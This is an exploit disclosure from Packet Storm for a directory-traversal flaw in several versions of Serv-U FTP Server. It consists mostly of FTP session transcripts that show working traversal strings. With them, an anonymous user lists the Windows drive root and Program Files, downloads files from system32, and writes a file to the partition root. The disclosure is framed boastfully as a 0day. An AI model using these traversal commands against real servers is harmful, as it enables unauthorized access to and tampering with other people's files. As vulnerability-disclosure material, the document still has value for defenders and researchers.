Serv-U FTP Server Jail Break

2011-11-30T00:00:00
ID PACKETSTORM:107411
Type packetstorm
Reporter Kingcope
Modified 2011-11-30T00:00:00

Description

                                        
                                            `I m better than TESO!  
CONFIDENTIAL SOURCE MATERIALS!  
  
[*]----------------------------------------------------[*]  
Serv-U FTP Server Jail Break 0day  
Discovered By Kingcope  
Year 2011  
[*]----------------------------------------------------[*]  
  
Affected:  
220 Serv-U FTP Server v7.3 ready...  
220 Serv-U FTP Server v7.1 ready...  
220 Serv-U FTP Server v6.4 ready...  
220 Serv-U FTP Server v8.2 ready...  
220 Serv-U FTP Server v10.5 ready...  
  
[*]----------------------------------------------------[*]  
C:\Users\kingcope\Desktop>ftp 192.168.133.134  
Verbindung mit 192.168.133.134 wurde hergestellt.  
220 Serv-U FTP Server v6.4 for WinSock ready...  
Benutzer (192.168.133.134:(none)): ftp (anonymous user :>)  
331 User name okay, please send complete E-mail address as password.  
Kennwort:  
230 User logged in, proceed.  
ftp> cd "/..:/..:/..:/..:/program files"  
250 Directory changed to /LocalUser/LocalUser/LocalUser/LocalUser/program files  
ftp> ls -la  
200 PORT Command successful.  
150 Opening ASCII mode data connection for /bin/ls.  
dr--r--r-- 1 user group 0 Nov 12 21:48 .  
dr--r--r-- 1 user group 0 Nov 12 21:48 ..  
drw-rw-rw- 1 user group 0 Feb 14 2011 Apache Software Foundatio  
n  
drw-rw-rw- 1 user group 0 Feb 5 2011 ComPlus Applications  
drw-rw-rw- 1 user group 0 Jul 11 01:06 Common Files  
drw-rw-rw- 1 user group 0 Jul 8 16:57 CoreFTPServer  
drw-rw-rw- 1 user group 0 Jul 11 01:06 IIS Resources  
d--------- 1 user group 0 Jul 8 16:12 InstallShield  
Installation Information  
drw-rw-rw- 1 user group 0 Jul 29 15:07 Internet Explorer  
drw-rw-rw- 1 user group 0 Jul 8 16:12 Ipswitch  
drw-rw-rw- 1 user group 0 Feb 12 2011 Java  
drw-rw-rw- 1 user group 0 Jul 26 13:19 NetMeeting  
drw-rw-rw- 1 user group 0 Jul 29 14:39 Outlook Express  
drw-rw-rw- 1 user group 0 Jul 8 15:39 PostgreSQL  
drw-rw-rw- 1 user group 0 Nov 12 21:48 RhinoSoft.com  
drw-rw-rw- 1 user group 0 Feb 12 2011 Sun  
d--------- 1 user group 0 Jul 29 15:13 Uninstall Information  
drw-rw-rw- 1 user group 0 Feb 5 2011 VMware  
drw-rw-rw- 1 user group 0 Jul 8 15:34 WinRAR  
drw-rw-rw- 1 user group 0 Jul 26 13:30 Windows Media Player  
drw-rw-rw- 1 user group 0 Feb 5 2011 Windows NT  
d--------- 1 user group 0 Feb 5 2011 WindowsUpdate  
226 Transfer complete.  
FTP: 1795 Bytes empfangen in 0,00Sekunden 448,75KB/s  
ftp>  
[*]----------------------------------------------------[*]  
with write perms:  
ftp> put foo.txt ..:/..:/..:/foobar <<-- writes foo into root of partition  
[*]----------------------------------------------------[*]  
and as anonymous ftp:  
ftp> get ..:/..:/..:/..:/windows/system32/calc.exe yes  
200 PORT Command successful.  
150 Opening ASCII mode data connection for calc.exe (115712 Bytes).  
226 Transfer complete.  
FTP: 115712 Bytes empfangen in 0,04Sekunden 2571,38KB/s  
[*]----------------------------------------------------[*]  
  
This works to!!! :  
  
220 Serv-U FTP Server v7.3 ready...  
Benutzer (xx.xx.xx.xx:(none)): ftp  
331 User name okay, please send complete E-mail address as password.  
Kennwort:  
230 User logged in, proceed.  
ftp> ls "-a ..:\:..\..:\..:\..:\..:\..:\..:\..:\*"  
200 PORT Command successful.  
150 Opening ASCII mode data connection for /bin/ls.  
.  
..  
AUTOEXEC.BAT  
boot.ini  
bootfont.bin  
bsmain_runtime.log  
CONFIG.SYS  
Documents and Settings  
FPSE_search  
Inetpub  
IO.SYS  
log  
MSDOS.SYS  
msizap.exe  
MSOCache  
mysql  
NTDETECT.COM  
ntldr  
Program Files  
RavBin  
RECYCLER  
Replay.log  
rising.ini  
System Volume Information  
TDDOWNLOAD  
WCH.CN  
WINDOWS  
wmpub  
226 Transfer complete. 317 bytes transferred. 19.35 KB/sec.  
FTP: 317 Bytes empfangen in 0,01Sekunden 21,13KB/s  
  
[*]----------------------------------------------------[*]  
Sometimes you need to give it the path:  
  
ftp> ls "-a ..:\:..\..:\..:\..:\..:\..:\..:\..:\program files\"  
ftp> ls "-a ..:\:..\..:\..:\..:\..:\..:\..:\..:\program files\*"  
200 PORT Command successful.  
150 Opening ASCII mode data connection for /bin/ls.  
.  
..  
360  
Adobe  
ASP.NET  
CCProxy  
CE Remote Tools  
cmak  
Common Files  
ComPlus Applications  
D-Tools  
FFTPServer  
HTML Help Workshop  
IISServer  
InstallShield Installation Information  
Intel  
Internet Explorer  
Java  
JavaSoft  
K-Lite Codec Pack  
Microsoft ActiveSync  
Microsoft Analysis Services  
Microsoft Device Emulator  
Microsoft MapPoint Web Service Samples  
Microsoft MapPoint Web Service SDK, Version 4.0  
Microsoft Office  
Microsoft Office Servers  
Microsoft Silverlight  
Microsoft SQL Server  
Microsoft Visual SourceSafe  
Microsoft Visual Studio 8  
Microsoft.NET  
MSBuild  
MSXML 6.0  
NetMeeting  
Outlook Express  
PortMap1.61  
Reference Assemblies  
Rising  
SQLXML 4.0  
SQLyog Enterprise  
STS2Setup_2052  
Symantec  
Thunder Network  
TSingVision  
Uninstall Information  
Windows Media Player  
Windows NT  
WindowsUpdate  
WinRAR  
226 Transfer complete. 835 bytes transferred. 50.96 KB/sec.  
FTP: 835 Bytes empfangen in 0,01Sekunden 64,23KB/s  
ftp>  
`